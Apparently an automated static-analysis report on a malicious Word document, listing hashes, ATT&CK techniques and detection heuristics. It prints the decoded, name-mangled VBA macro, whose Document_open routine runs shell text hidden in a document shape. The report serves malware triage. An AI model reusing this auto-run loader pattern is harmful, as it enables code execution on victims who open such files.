Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b7b98a6c22284d5d…

MALICIOUS

Office (OLE)

135.4 KB Created: 2018-11-30 20:11:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 39cd2c3d99bb9e87fc7a2b57150f4236 SHA-1: e33c2a2c8fa7dbcc60202b1b50ffdcc18616e375 SHA-256: b7b98a6c22284d5d88e11cb9c86eb8bacf51279d8953372a9fde660b31e64a85
272 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open auto-execution macro, which is designed to invoke cmd.exe and PowerShell. The presence of `Shell() call in VBA` and `Suspicious cmd.exe invocation with execution flag` heuristics indicates an attempt to execute arbitrary commands. The script likely downloads and executes a second-stage payload, as suggested by the command-line arguments and the use of PowerShell.

Heuristics 9

  • ClamAV: Doc.Malware.Dkah-6765262-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Dkah-6765262-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
                OrGRwDv = CByte(332812892)
alvtTwo = Array(XciMTmTl, Interaction.Shell(WrGLWSv, AAniRwCiiqi), cjZkYiDr)
   On Error Resume Next
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6199 bytes
SHA-256: 73df65fe848036f1c1fa10bcbcc9e2454ed54228eb1daba34e673fce95caf94f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
131 of 209 identifiers look randomly generated (e.g. 'WqBWoZjhG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kuhciToiBsf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
            StqdsKvQT = Atn(JAsdSfZo)
            FiIuN = CLng(oZkDCUj)
            UqsFVD = Cos(iSlNo)
            WHhimME = CByte(OKwcBD)
            KNQMZjYm = CByte(171724181)
            DkFWPWh = CBool(163439428)
            SRCUQ = fIGfu
            UAPYFVB = 95930298
            zUHIibwpw = CByte(257833514)
   On Error Resume Next
            nlltrPWNj = Atn(XOEKOC)
            OUuizfi = CLng(lpjSAipXc)
            GrfdzY = Cos(jEZFR)
            zZolXN = CByte(qGCDG)
            nufiiqc = CByte(275580303)
            KrkUW = CBool(205607288)
            bJlUVj = LzSKTiApc
            akIBVrO = 270292668
            sPwACqd = CByte(168791401)
   On Error Resume Next
            YbuGO = Atn(YFoANS)
            kYEdY = CLng(QiWqp)
            WFjhKHOju = Cos(UPdHTibva)
            NMBVcJ = CByte(wpbBlFIr)
            oXdtw = CByte(234535269)
            mEpzRm = CBool(227149777)
            bPVlK = NFBXP
            SviKVPKtD = 113404778
            VdAOQnJS = CByte(78530423)
Set aWkWhE = Shapes("ErzfIAGl")
   On Error Resume Next
            nkPXPi = Atn(kQfEuWJEf)
            VXSVWN = CLng(DRCJMp)
            TiEYqj = Cos(qolEuG)
            LAkEAwOu = CByte(uRWvTzbpX)
            LkMRlNv = CByte(52563938)
            jhQbHkr = CBool(110373146)
            FMsFYl = HTort
            vhTuwz = 234891939
            qEokLPipP = CByte(72085237)
   On Error Resume Next
            YwpduhDZj = Atn(qVCflwEbL)
            izZSbMXYw = CLng(EwSLiW)
            slkADjL = Cos(pUFCpU)
            KFSYY = CByte(CiJibQv)
            DrAPaLqbq = CByte(176494022)
            NFmsSV = CBool(58170021)
            DmNsGzAqC = VcPQTld
            nOIKi = 98601421
            FLRPprJSS = CByte(288591306)
WrGLWSv = aWkWhE.TextFrame.ContainingRange
   On Error Resume Next
            quaQHoH = Atn(ZDkDMFC)
            UEIAYCL = CLng(GllUZIFi)
            rztzSm = Cos(tpGMp)
            OSZdjmo = CByte(GojmJVDmw)
            wCmUHJ = CByte(156056469)
            RDHjw = CBool(336078167)
            jXSvvZStY = JKKJRBGq
            NmnuLPGhV = 240402519
            Wrkpcwkq = CByte(21100133)
   On Error Resume Next
            cLNwizb = Atn(fZrLhl)
            EGCjTRuP = CLng(DbbBjfarz)
            oEZAziwrh = Cos(BdnwAafwz)
            EhvRvH = CByte(ZkAwANl)
            fiGCCVaNY = CByte(306291966)
            niAJAit = CBool(227564134)
            GJIFsFYGh = BQCzVvYtu
            dUXXVTuYa = 338239543
            GispWW = CByte(7332469)
   On Error Resume Next
            mRkmwnwI = Atn(YaUjqEBCr)
            wvGYp = CLng(HTKpovfGP)
            GwKBWpif = Cos(IuMWThEw)
            Eofsvqo = CByte(oSKduO)
            DzCrqh = CByte(61639507)
            blhBuz = CBool(284007824)
            jwGBb = NDUMC
            PVJNj = 315670917
            VfNHrv = CByte(176678149)
Const AAniRwCiiqi = 0
   On Error Resume Next
            OzTwr = Atn(nvvVupuF)
            PiniUV = CLng(jaREwasbb)
            EzqMRjrXd = Cos(YwTsYnujN)
            MMlPOtimn = CByte(DUuEkz)
            EzvvKr = CByte(164615537)
            lGZfIjI = CBool(88325752)
            csLawYFE = QtDDPHbX
            lStCVMod = 255033947
            HijuG = CByte(57217643)
   On Error Resume Next
            XQqjlaq = Atn(IwAMrC)
            aKuDIszdJ = CLng(GiLWzGc)
            wVSGZOF = Cos(IpSKwhV)
            CdCaKiZ = CByte(hIfvfwIq)
            ptjaTkf = CByte(329501148)
            jIKwaZIl = CBool(132885167)
            DBMTvfZ = jJvMjc
            HnozitWc = 184382348
            RcihFntcn = CByte(256524343)
   On Error Resume Next
            ljqdMmc = Atn(iuUurbiEs)
            HotcIqL = CLng(FtKzuBsJk)
            fLBSXEcvL = Cos(pbVqkzM)
            bIXzSN = CByte(inizSChr)
            YjYoRoAM = CByte(206786759)
            JdYUPuoa = CBool(222044898)
            ZjsnloR = wsWHkiSDa
            AnIKUfE = 24477981
            TOFib = CByte(339730417)
   On Error Resume Next
            QClNCF = Atn(wfbBUzZSa)
            VtZUbzi = CLng(BiLVizjXK)
            jFAsDWWu = Cos(nBaqoTIu)
            kzpFG = CByte(BamcBi)
            znslUXc = CByte(276624050)
            zhJqt = CBool(173267957)
            WCVCXmLs = whrdjut
            SDnwC = 332392668
            RThBHvQZ = CByte(175884099)
   On Error Resume Next
            djarNuq = Atn(WqBWoZjhG)
            zuVWPi = CLng(iwtihzZm)
            SKCWAH = Cos(JiIsvMaS)
            oDFDCGRv = CByte(jwwRo)
            bkZHVfjLs = CByte(76245296)
            oHlrRV = CBool(178924155)
            stUiMLtHS = ImstOR
            mTwAFr = 90068121
            qSJKMRcVR = CByte(315669904)
   On Error Resume Next
            oWMQAUmCl = Atn(puWrhZmD)
            PCILS = CLng(zdTVZqNuK)
            ckimtDjzY = Cos(HEDwrJri)
            rjLuaBrS = CByte(LzbzLwFo)
            RJLVK = CByte(254717930)
            iuaUdQwi = CBool(46700314)
            OQqElC = zmbLHtGt
            BaZbW = 146854468
            OrGRwDv = CByte(332812892)
alvtTwo = Array(XciMTmTl, Interaction.Shell(WrGLWSv, AAniRwCiiqi), cjZkYiDr)
   On Error Resume Next
            pJWUK = Atn(ttijS)
            LwLmpGVC = CLng(FzXZuCat)
            wLwAS = Cos(fPIOstBK)
            DMUVKNA = CByte(tRjJwv)
            ATAZkG = CByte(270343068)
            idGazH = CBool(66656967)
            EpsVhiEiv = wDjiYhTtO
            tbaYOCp = 292297407
            nDIia = CByte(199832818)
   On Error Resume Next
            znPdaun = Atn(jwPwdBE)
            TCZDmVrU = CLng(SqAwNs)
            aVfbEiEwY = Cos(bwZWf)
            zpaJW = CByte(ocwuM)
            DmjTG = CByte(123892300)
            HVdhpzb = CBool(205175796)
            tvvtmnBI = jZUhDiKR
            ulUIpGzXh = 144274396
            lLvbC = CByte(227563495)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.